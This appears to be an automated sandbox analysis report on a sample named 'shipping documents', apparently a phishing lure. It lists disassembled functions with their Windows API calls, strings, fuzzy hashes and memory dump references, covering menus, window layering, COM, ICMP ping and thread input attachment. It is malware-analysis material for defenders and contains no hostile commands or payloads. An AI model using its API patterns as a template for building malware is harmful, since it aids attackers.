Opcode Fuzzy Hash: 1c7cf72562cc001a7ee97ecf5a26a86d5e7f1bd36a3921a1da7703b26187e210
Instruction Fuzzy Hash: 33518E70A04305AFD704DF28CC55FAA7BF6EB88310F00852EF9968B2E1DB759949CB56

Function 00659997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 006599C2
__swprintf.LIBCMT ref: 00659A0C
__i64tow.LIBCMT ref: 0068FA0F

Strings

False, xrefs: 0068F9D7
0x%p, xrefs: 0068F9F1
%.15g, xrefs: 00659A06
True, xrefs: 0068F9D0

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 2f1146ff1818a0d14a3c6f1ccf23625d9d07f4455f27fdcf9cc3b0d1e29b001d
Instruction ID: 892e2c48c00f70a03a6e8337007b62dcf759622f31d99410aef87aee7b7371a4
Opcode Fuzzy Hash: 2f1146ff1818a0d14a3c6f1ccf23625d9d07f4455f27fdcf9cc3b0d1e29b001d
Instruction Fuzzy Hash: 3C410371614205EBEF24EF38D842EBA73EAEB44300F24456EE949D7281EA719946DB21

Function 006D73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006D73D9
CreateMenu.USER32 ref: 006D73F4
SetMenu.USER32(?,00000000), ref: 006D7403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006D7490
IsMenu.USER32(?), ref: 006D74A6
CreatePopupMenu.USER32 ref: 006D74B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006D74DD
DrawMenuBar.USER32 ref: 006D74E5

Strings

F, xrefs: 006D74D1
0, xrefs: 006D73CF

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: dd05f47f8b108fc6ae664be13860206a6e8acbf7b39dc92724c36af6d2fbaf13
Instruction ID: 08ed89cdfe3f0ea571f3e717f66b901cfe17aee58dbc491a2e2d770e1b76d96b
Opcode Fuzzy Hash: dd05f47f8b108fc6ae664be13860206a6e8acbf7b39dc92724c36af6d2fbaf13
Instruction Fuzzy Hash: 8F415874A05205EFDB21DF68E884ADABBF6FF59300F14402AFD5697360E730A910CB51

Function 006D772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006D77CD
CreateCompatibleDC.GDI32(00000000), ref: 006D77D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006D77E7
SelectObject.GDI32(00000000,00000000), ref: 006D77EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 006D77FA
DeleteDC.GDI32(00000000), ref: 006D7803
GetWindowLongW.USER32(?,000000EC), ref: 006D780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006D7821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006D782D

Strings

static, xrefs: 006D7765

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: f20030b62e8ebdf877097643b2084e908720873cd71358c61efaf0ad18f48fd0
Instruction ID: 0002ab595441554f3bf3935b0b61da8bef4a2d9226a2d9fc723efcda3b04df98
Opcode Fuzzy Hash: f20030b62e8ebdf877097643b2084e908720873cd71358c61efaf0ad18f48fd0
Instruction Fuzzy Hash: 8D319C32905215BBDF119FA5DC09FDA3B6AFF09321F114226FA16E62E0D731D821DBA4

Function 00677040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0067707B

Part of subcall function 00678D68: __getptd_noexit.LIBCMT ref: 00678D68

__gmtime64_s.LIBCMT ref: 00677114
__gmtime64_s.LIBCMT ref: 0067714A
__gmtime64_s.LIBCMT ref: 00677167
__allrem.LIBCMT ref: 006771BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006771D9
__allrem.LIBCMT ref: 006771F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0067720E
__allrem.LIBCMT ref: 00677225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00677243
__invoke_watson.LIBCMT ref: 006772B4

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 99e0702c119f0158cd29e4034a09036167ca2336c8e8461ca4f41d3cda1eddb9
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: CA71B8B1A04717ABD714AE79CC41B9AB3A6AF14720F14C23EF528E7781FB70DA408794

Function 006B2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006B2A31
GetMenuItemInfoW.USER32(00716890,000000FF,00000000,00000030), ref: 006B2A92
SetMenuItemInfoW.USER32(00716890,00000004,00000000,00000030), ref: 006B2AC8
Sleep.KERNEL32(000001F4), ref: 006B2ADA
GetMenuItemCount.USER32(?), ref: 006B2B1E
GetMenuItemID.USER32(?,00000000), ref: 006B2B3A
GetMenuItemID.USER32(?,-00000001), ref: 006B2B64
GetMenuItemID.USER32(?,?), ref: 006B2BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006B2BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B2C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B2C24

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 38b7bb8e86c83fd3967bb2dc14e9c6f1f16a78f888963651dc325674ab7aa8ef
Instruction ID: 7864dd82e496eef03fe68647ae10b7000c6cdd412b8ba8e09536538b0702b3a3
Opcode Fuzzy Hash: 38b7bb8e86c83fd3967bb2dc14e9c6f1f16a78f888963651dc325674ab7aa8ef
Instruction Fuzzy Hash: 63619DF090024AAFDB21CF64DCA89FE7BFAFB41308F144559E84297251DB35AD85DB21

Function 006D7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006D7214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006D7217
GetWindowLongW.USER32(?,000000F0), ref: 006D723B
_memset.LIBCMT ref: 006D724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006D725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006D72D6

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 88959039907cbe8d39a67bd4f887bc1b3a710923049ada3a5ec16ec07eb05fb9
Instruction ID: 681c0f6118329406f50d3c4d4ba5f2ae4ad16ae7d6ab2991af71358f50036386
Opcode Fuzzy Hash: 88959039907cbe8d39a67bd4f887bc1b3a710923049ada3a5ec16ec07eb05fb9
Instruction Fuzzy Hash: 8D617B71900248AFDB10DFA8CC81EEE77F9AB09710F14415AFA14A73A1D774AA45DB64

Function 006A710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006A7135
SafeArrayAllocData.OLEAUT32(?), ref: 006A718E
VariantInit.OLEAUT32(?), ref: 006A71A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 006A71C0
VariantCopy.OLEAUT32(?,?), ref: 006A7213
SafeArrayUnaccessData.OLEAUT32(?), ref: 006A7227
VariantClear.OLEAUT32(?), ref: 006A723C
SafeArrayDestroyData.OLEAUT32(?), ref: 006A7249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006A7252
VariantClear.OLEAUT32(?), ref: 006A7264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006A726F

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 6161c3c96f24fc0b6dd0c638b15b43d0e6b74f2c802268665c83e764f5bc91c4
Instruction ID: 4585f4ff4ccbf7f12169ef38e5b05eb48c5fe0c49c1e6a2121061ade55097278
Opcode Fuzzy Hash: 6161c3c96f24fc0b6dd0c638b15b43d0e6b74f2c802268665c83e764f5bc91c4
Instruction Fuzzy Hash: 9A413F35D00119AFCB00EF64DC44AAEBBFAEF49354F008069F916A7261CB30AE45CFA0

Function 006C86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

CoInitialize.OLE32 ref: 006C8718
CoUninitialize.OLE32 ref: 006C8723
CoCreateInstance.OLE32(?,00000000,00000017,006E2BEC,?), ref: 006C8783
IIDFromString.OLE32(?,?), ref: 006C87F6
VariantInit.OLEAUT32(?), ref: 006C8890
VariantClear.OLEAUT32(?), ref: 006C88F1

Strings

NULL Pointer assignment, xrefs: 006C87C8
Invalid parameter, xrefs: 006C880F
Failed to create object, xrefs: 006C878E, 006C8844

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 2d50f6f48217e49413cbcb0a2905a694a36bb1d141768fd9c26befe83dfc3f76
Instruction ID: 76ed77cdeea3d94e1f3bf582dc4c5c5976385d482ef87cac31c7b0e64fcbce8b
Opcode Fuzzy Hash: 2d50f6f48217e49413cbcb0a2905a694a36bb1d141768fd9c26befe83dfc3f76
Instruction Fuzzy Hash: D8619B70609301AFD720DF24C848F6AB7EAEF45714F14481EF9869B291DB30ED48CBA6

Function 006C5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 006C5AA6
inet_addr.WSOCK32(?,?,?), ref: 006C5AEB
gethostbyname.WSOCK32(?), ref: 006C5AF7
IcmpCreateFile.IPHLPAPI ref: 006C5B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006C5B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006C5B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 006C5C00
WSACleanup.WSOCK32 ref: 006C5C06

Strings

Ping, xrefs: 006C5B29

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: ee8ab2da103c3c03461817e2da0b176d4df36c359bb5419619e2f0f9e64da0ff
Instruction ID: bf1495e85959b4c0aecf6a1aa572a8b31df194631614c68b5768917c4adfa4a4
Opcode Fuzzy Hash: ee8ab2da103c3c03461817e2da0b176d4df36c359bb5419619e2f0f9e64da0ff
Instruction Fuzzy Hash: 01514A316047009FDB10AF24CC59F6ABBE6EB44710F14892EF956DB2A1DB70FD448B56

Function 006BB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006BB73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006BB7B1
GetLastError.KERNEL32 ref: 006BB7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 006BB828

Strings

UNKNOWN, xrefs: 006BB7E0
READONLY, xrefs: 006BB7F3
NOTREADY, xrefs: 006BB7E7
INVALID, xrefs: 006BB7FA
READY, xrefs: 006BB801

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 0edfeab9b047e1caf6d33e032b4272d0f966f660b9a3ab1518cb947fa1df07d8
Instruction ID: b57efade4df294ef75f9a41bfca16793f65deb3f1c5fe4f9be14932c983a2152
Opcode Fuzzy Hash: 0edfeab9b047e1caf6d33e032b4272d0f966f660b9a3ab1518cb947fa1df07d8
Instruction Fuzzy Hash: 193192B5A00209EFDB00EF64D885EFE77BAEF44700F14912AE902D72D1DBB19986CB51

Function 006A9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

Part of subcall function 006AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006AB0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006A94F6
GetDlgCtrlID.USER32 ref: 006A9501
GetParent.USER32 ref: 006A951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 006A9520
GetDlgCtrlID.USER32(?), ref: 006A9529
GetParent.USER32(?), ref: 006A9545
SendMessageW.USER32(00000000,?,?,00000111), ref: 006A9548

Strings

ComboBox, xrefs: 006A947E
ListBox, xrefs: 006A94B3

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: fa571f1309fe7581881ca9218e370ded6da5ff613dfc6b18c12b688d717cf6d5
Instruction ID: cb71e634e8484ba0144a634de43897471c167c92740b6c4ff02d2e1c88bf97c8
Opcode Fuzzy Hash: fa571f1309fe7581881ca9218e370ded6da5ff613dfc6b18c12b688d717cf6d5
Instruction Fuzzy Hash: D821B070D00204ABCF05AB64CC85DFEBBB6EF4A300F10412AB962972E2DB7599199E20

Function 006A955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

Part of subcall function 006AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006AB0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006A95DF
GetDlgCtrlID.USER32 ref: 006A95EA
GetParent.USER32 ref: 006A9606
SendMessageW.USER32(00000000,?,00000111,?), ref: 006A9609
GetDlgCtrlID.USER32(?), ref: 006A9612
GetParent.USER32(?), ref: 006A962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 006A9631

Strings

ComboBox, xrefs: 006A9569
ListBox, xrefs: 006A959E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 79291555a757c6312734b0e2d40359c990ca720aab24b430cc58922db935b231
Instruction ID: eafd99dcb16754c1b95e9eb7dcaec6bf0a37c18a5d66d1c778efbe274a240e3d
Opcode Fuzzy Hash: 79291555a757c6312734b0e2d40359c990ca720aab24b430cc58922db935b231
Instruction Fuzzy Hash: 9C21B374D00204BBDF01AB74CC85EFEBBBAEF4A300F10511AB952972E2DB7599199E20

Function 006A9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 006A9651
GetClassNameW.USER32(00000000,?,00000100), ref: 006A9666
_wcscmp.LIBCMT ref: 006A9678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006A96F3

Strings

list, xrefs: 006A96D5
smallicons, xrefs: 006A96BB
largeicons, xrefs: 006A9687
SHELLDLL_DefView, xrefs: 006A9672
details, xrefs: 006A96A1

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: d8d9fa09bc0a0aac4c31a0366b1ee6cbbf2a22db595812ab0669ad54d83777e7
Instruction ID: 3ea6b9fad8b6a62872c09ebb3b37af5360e3065ac9bfd1576157691ec6a27b31
Opcode Fuzzy Hash: d8d9fa09bc0a0aac4c31a0366b1ee6cbbf2a22db595812ab0669ad54d83777e7
Instruction Fuzzy Hash: 3F1106B7248317BAFB013631DC06DE677DE8F06760B30512AFA05A51D2FEA2AD115D68

Function 006B4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 006B419D
__swprintf.LIBCMT ref: 006B41AA

Part of subcall function 006738D8: __woutput_l.LIBCMT ref: 00673931

FindResourceW.KERNEL32(?,?,0000000E), ref: 006B41D4
LoadResource.KERNEL32(?,00000000), ref: 006B41E0
LockResource.KERNEL32(00000000), ref: 006B41ED
FindResourceW.KERNEL32(?,?,00000003), ref: 006B420D
LoadResource.KERNEL32(?,00000000), ref: 006B421F
SizeofResource.KERNEL32(?,00000000), ref: 006B422E
LockResource.KERNEL32(?), ref: 006B423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006B429B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: d910c5b03e4793e084084e638a9af0672aa4aa448ede2649e58dc072517a7a49
Instruction ID: 142c92857cb3ed36e2fbac92eaf0915e85ddfe534322764e5656f27d6ee2a999
Opcode Fuzzy Hash: d910c5b03e4793e084084e638a9af0672aa4aa448ede2649e58dc072517a7a49
Instruction Fuzzy Hash: 4B3175B190521AABDB119FA0DC44EFF7BAEEF04301F048525F906D6251DB34DB91D7A4

Function 006B16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006B1700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,006B0778,?,00000001), ref: 006B1714
GetWindowThreadProcessId.USER32(00000000), ref: 006B171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006B0778,?,00000001), ref: 006B172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 006B173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006B0778,?,00000001), ref: 006B1755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006B0778,?,00000001), ref: 006B1767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006B0778,?,00000001), ref: 006B17AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006B0778,?,00000001), ref: 006B17C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006B0778,?,00000001), ref: 006B17CC

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

